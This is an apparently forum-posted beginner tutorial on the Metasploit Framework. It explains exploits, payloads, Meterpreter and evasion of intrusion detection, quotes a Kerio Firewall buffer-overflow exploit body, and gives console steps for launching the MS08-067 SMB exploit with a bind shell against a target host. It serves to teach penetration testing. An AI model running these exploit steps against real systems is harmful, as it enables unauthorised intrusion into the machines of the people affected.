Yeah, I kinda wrote this as a tutorial for a magazine, but I thought I would release it to you guys as well because it uses BackTrack 3. Most of you probably already know how to do this, so it's kinda written for the newbies, but it's here none-the-less. Opinions please For the original PDF version (which has pictures), go to http://greyhat-security.com/msf.pdf

(Apologies for the multiple replies - but there's a 10,000 character limit per post; it didn't all fit )



About the Article

You've probably heard a lot of talk about Metasploit over the years; about how it can speed up the results of exploitation. It is a great tool for Penetration testers. It makes their job of exploitation and post-exploitation a lot easier, and a lot faster. However, coverage on how to use Metasploit is not always readily available. There are a few lesser known features of Metasploit which I would like to show you. The aim of this article is to teach you what the Metasploit project is, the basics of how to use it, and an example of a lesser known feature: how to use Metasploit to tunnel from inside a corporate network when an external firewall is impenetrable, and then how to exploit the internal network from there. Curious? Read on.

So – Metasploit?
The Metasploit Framework is a program and subproject developed by Metasploit LLC. It was initially created in 2003 in the Perl programming language, but was later completely re-written in the Ruby Programming Language. As of the most recent release (3.2), released under the BSD licensing scheme (to make it truly Open Source, as opposed to its previous Metasploit License which made it partially Open Source).

Metasploit aims to provide an exploit development framework for Penetration Testers, as well as to simplify the process of exploit development. Exploits are bits of code or scripts that will take advantage of a vulnerability in a program, and perform unauthorized actions. Examples of such actions include the execution of arbitrary code, the crashing or a particular program, or DoS of a particular system or service. Exploits are used by Penetration Testers to test various programs on a network for vulnerabilities (before hackers/crackers are able to), so that they can be fixed. They are also used and abused by “script kiddies” or “Black Hats” to break into systems. Typically, a vulnerability researcher would have to go through the cycle of Discovery > Disclosure > Analysis > Exploit Development > Testing > Release. However, since the release of Metasploit, exploit development is now quite a simple process that even an amateur coder can accomplish. It also serves as a development platform for payloads (the code executed after an exploit has successfully been run), payload encoders (to obscure data so that Intrusion Detection Systems [IDS] and Intrusion Protecion Systems [IPS] don't pick up and block the exploit), and various other tools. The Metasploit Project also contains a NOOP Code Database (set of Assembly language instructions for the processor).

Metasploit has a few distinct advantages for penetration testers. One of them is that you can use Metasploit to test an exploit (whether it's your own or someone else's) on all the machines on a network simultaneously, and have it automatically exploit and gain you an Administrative shell on each system. You can also feed it results from other programs (such as Nmap or Nessus – usage instructions for these can be found on the vendor website, or at http://greyhat-security.com/) and use that to target only specific services in a network wide exploit session. It also simplifies the job of a penetration tester in the sense that they are able to start up Metasploit, leave it running by itself in the background, and proceed to attempt other Network Penetration Tests. A distinct advantage that is good for a quick preliminary vulnerability assessment is Metasploit's ability to integrate with Nmap to perform an action known as “Autopwning” (read more about it below).
Additionally, if a compromised box has two or more separate subnets or NIC's (Network Interface Cards), then the Penetration Tester can add a tunnel through this box via Metasploit, and is therefore able to interact with or exploit the machines on the separate subnet which the Penetration Tester could not initially access. Aside from Metasploit's sheer power and ease of use, it also allows Forensic Avoidance tools and a number of other IDS evasion techniques to be executed. The 3.0 branch of the development also allows developers to code their own plug-ins, allowing for an unlimited number of options (limited only by creativity and personal ability).

The Metasploit Framework has a number of different interfaces which a user can choose to interact with. The command line interface is the interface of choice for most Linux users, due to its simplicity and light-weight nature. It is operated through a series of commands. It allows the user to: choose an exploit and a payload, show options for both of these, configure options for both of these, choose a platform, and launch the exploit. The Web interface is the UI of choice for most Windows users, as the separate command line isn't always guaranteed to be stable – the web interface contains a built-in command line, as well as a graphical exploitation option. This can be started by going to Start Menu > Programs > Metasploit Framework > MSFWeb, and the firing up your web browser and going to http://127.0.0.1:55555. The MSF (Metasploit Framework) GUI is also a popular option for Windows users, as it feels more like a conventional “program” than a command line, and is what most Windows users are comfortable with. There is also a Metasploit daemon, which is a Metasploit command line tool that listens for, and interacts with, remote connections.

The MSF focuses on simplicity for the Penetration Tester. For example, the following code is from the body of the Kerio Firewall 2.1.4 Authentication Packet Overflow exploit:
Code Listing 1:
Code:
connect 
print_status("Trying target #{target.name}...") 
sploit =  make_nops(4468) + payload.encoded 
sploit << [target.ret].pack('V') + [0xe8, -850].pack('CV') 
sock.put(sploit) 
sock.get_once(-1, 3) 
handler 
disconnect
A powerful feature of the MSF that simplifies the post-exploitation process is the Meterpreter module, which is injected directly into a running process on the exploited system, aiding in IDS evasion, and assisting in avoidance of detection by the user. In a penetration test, a lot of focus is placed on information gathering and exploitation, not a lot of importance is given to the power of the post-exploitation phase. It is during this period that the most damage is done, and this is where Meterpreter becomes quite handy. Meterpreter aims to avoid HIDS (Host Intrusion Detection Systems) by injecting itself into the running process, as well as providing the attacker with a platform on which further scripts can be coded and launched. It is an injected attack platform. It also supports port forwarding in a manner similar to SSH. The MSF Project also has support for database integration, so it can output and interact with various databases, such as Postgres or SQLite.

How do you work metasploit?

Metasploit is simple to use – as was mentioned before, it is designed with ease-of-use in mind to aid Penetration Testers. It functions in the following way; you gather info about the target (ports, services, etc.), decide on a vulnerable service, select the exploit, fill in a few options, select a payload, fill in options there as well, and then launch the exploit. I will walk you through a brief demo, just so you can get familiar with the basics of the MSF, then you can work at your own pace. I will be taking you through this demo in BackTrack 3 (which is what Hakin.9 Live is based on), so go ahead and download that if you don't already have it - http://www.remote-exploit.org/backtrack_download.html. The reason for using BackTrack 3 is because it has the correct Ruby Libraries. The most updated Ruby Library (except for the CVS snapshot) isn't completely compatible with Metasploit. First, take your copy of BackTrack, and go to:
K menu > Backtrack > Penetration > Framework Version 3 > Framework3-MsfC
This will bring up the main Metasploit console prompt. Once this is done, you have many options. The first step (after scanning your target system for open ports/services) is to show the available exploits:
show exploits
This will bring up a list of all of them. The list will look similar to the following:
For this example, we will choose the recent Microsoft MS08_067 exploit. To select it, you type “use”, and the name of the exploit as displayed on the left:
use windows/smb/ms08_067_netapi
This will select that desired exploit. Now, we need to take a look at the options (you can also see the vulnerable systems available with the “show targets” command – this is not required for this exploit however):
show options
Just before we go setting options, we also need to choose a payload:
show payloads
set payload windows/shell/bind_tcp
show options


And finally, we are required to set the options. In this case, only the RHOST value is needed (the target/remote host). Then type “exploit”:
set RHOST 192.168.1.3
exploit


Those are the basic usage steps behind a simple Metasploit exploitation. There are also a number of options for you to explore on your own; things such as encoding payloads to avoid Anti-Virus and IDS, constructing your own exploits, payload generated executables, automated post-exploitation scripts, and numerous other tricks of the trade. Lets take a look at some of them.